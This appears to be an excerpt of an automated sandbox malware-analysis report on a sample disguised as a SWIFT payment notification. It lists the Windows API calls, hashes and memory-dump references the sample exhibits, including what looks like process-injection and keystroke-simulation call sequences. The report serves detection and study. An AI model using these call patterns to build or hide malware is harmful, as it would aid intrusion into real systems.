                                                                                                                              • Opcode Fuzzy Hash: 291c0696bda2c6d0ea991a4c2892309895d6b13f0ed428eaface8a755dd0f5b9
                                                                                                                              • Instruction Fuzzy Hash: 3B01DB72D056501AD225373D6849FEB2B854F82739F29052BF8798B2D2DE6DCCC1825D
                                                                                                                              APIs
                                                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 04121AA3
                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04121B39
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04121B5B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2438371351-0
                                                                                                                              • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                              • Instruction ID: 4a744a2e939b3372d3d7465f96beb7b66c1f8f36e83b46c3e312380eb7ab0571
                                                                                                                              • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                                                              • Instruction Fuzzy Hash: 9512DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5F91CF5A
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 544645111-0
                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                              • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                              • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                                              APIs
                                                                                                                              • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0040E028
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                                                                                              • Instruction ID: 77665f5636f8aa13b7259ebce8dce40215e8c2ccffea67f4db7731d49ba0d040
                                                                                                                              • Opcode Fuzzy Hash: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                                                                                              • Instruction Fuzzy Hash: 6C319C71B007159FCB24CF6EC88496BB7F6FB84310B14CA3EE45A93740D679E9458B54
                                                                                                                              APIs
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                • Part of subcall function 00418752: GetModuleFileNameW.KERNEL32(00000000,00496872,00000104,00000001,004115F6,00000000), ref: 004187EE
                                                                                                                                • Part of subcall function 00411682: ExitProcess.KERNEL32 ref: 00411693
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateExitFileHeapModuleNameProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1715456479-0
                                                                                                                              • Opcode ID: 3ff309d41164d49bbcde26d9f3c6c10fc997a437c42b4e7195dd8d5bf0d35fe7
                                                                                                                              • Instruction ID: dd3e10037244d4323a5b30826126ac5ac37045f84f17507dcfe2508c3b7f65da
                                                                                                                              • Opcode Fuzzy Hash: 3ff309d41164d49bbcde26d9f3c6c10fc997a437c42b4e7195dd8d5bf0d35fe7
                                                                                                                              • Instruction Fuzzy Hash: 9D01F5712543457AE7217B26AC41BEB37ACDB50B6AF21003BF100893A1CA6D89C2C73C
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00403962
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                                                                                              • Instruction ID: 166f8584a356b396cff84430351b18548b9fac1e31d224f9c9bf96d02c5d03dd
                                                                                                                              • Opcode Fuzzy Hash: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                                                                                              • Instruction Fuzzy Hash: 42111CB1200B019FD320CF55C984F27BBF8AB44711F10892ED5AA96B80D7B4FA45CBA4
                                                                                                                              APIs
                                                                                                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                                                                                              • Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
                                                                                                                              • Opcode Fuzzy Hash: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                                                                                              • Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5
                                                                                                                              APIs
                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,004164CD), ref: 00419D63
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 10892065-0
                                                                                                                              • Opcode ID: ae856a24b7f14ff9795d6297db4acaadf8ea867ddb32ba412a60cc9424a8be80
                                                                                                                              • Instruction ID: 2e78285c67f20dbf903d8901354c84d72f31961fc940439d2391f7b102ef2f30
                                                                                                                              • Opcode Fuzzy Hash: ae856a24b7f14ff9795d6297db4acaadf8ea867ddb32ba412a60cc9424a8be80
                                                                                                                              • Instruction Fuzzy Hash: E2C092B43813025BEB588B3AAC26B4925D45B08B42F21843EBA07DE5E0DAE19450AF08
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1452528299-0
                                                                                                                              • Opcode ID: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                                                                                                              • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                                                                                              • Opcode Fuzzy Hash: 852a3ca7f2627077b5b9f314f6d57bf7801f83530216794b81ea25db2d4422c1
                                                                                                                              • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                              • Sleep.KERNEL32(00000000,00000001,004115F6,?,00418256,00000018,0048D198,0000000C,004182E6,004115F6,004115F6,?,00417986,0000000D,?,004115F6), ref: 00416B25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateHeapSleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4201116106-0
                                                                                                                              • Opcode ID: 5d235bca9f66459b9abae02b4cc3e09111839f09c7b85c5a4bac4fb0e10ac7ef
                                                                                                                              • Instruction ID: 29b66831f95231b605567f83fe554f9f415e617bc059c2b68adb7d8a9d008894
                                                                                                                              • Opcode Fuzzy Hash: 5d235bca9f66459b9abae02b4cc3e09111839f09c7b85c5a4bac4fb0e10ac7ef
                                                                                                                              • Instruction Fuzzy Hash: B4E092329055255787306E7BE8448CB7B5ADBC13B1326073BF939C23D0D734ED828698
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000001F4), ref: 041222F9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                              • Instruction ID: 77660305f9b03f11307735ae3cde9dbdc05409e807012c7ad4152a1eda2747c5
                                                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                              • Instruction Fuzzy Hash: D4E0E67494010DDFDB00DFB4D6496DE7BB4EF04301F1005A1FD01D2280D7309D608A72
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                              • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                              • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                              • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                              • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                              • ImageList_SetDragCursorImage.COMCTL32(009E0468,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                              • ImageList_BeginDrag.COMCTL32(009E0468,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                              • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                              • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                              • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                              • SendMessageW.USER32 ref: 0047CD12
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                              • SendMessageW.USER32 ref: 0047CD80
                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                              • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                              • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                              • SendMessageW.USER32 ref: 0047CE93
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,03311BA8,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                              • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,03311BA8,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease
                                                                                                                              • String ID: @GUI_DRAGID$F
                                                                                                                              • API String ID: 115643240-4164748364
                                                                                                                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                              • IsIconic.USER32(?), ref: 0043444F
                                                                                                                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                              • API String ID: 2889586943-2988720461
                                                                                                                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                              APIs
                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                              • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                              • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                              • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
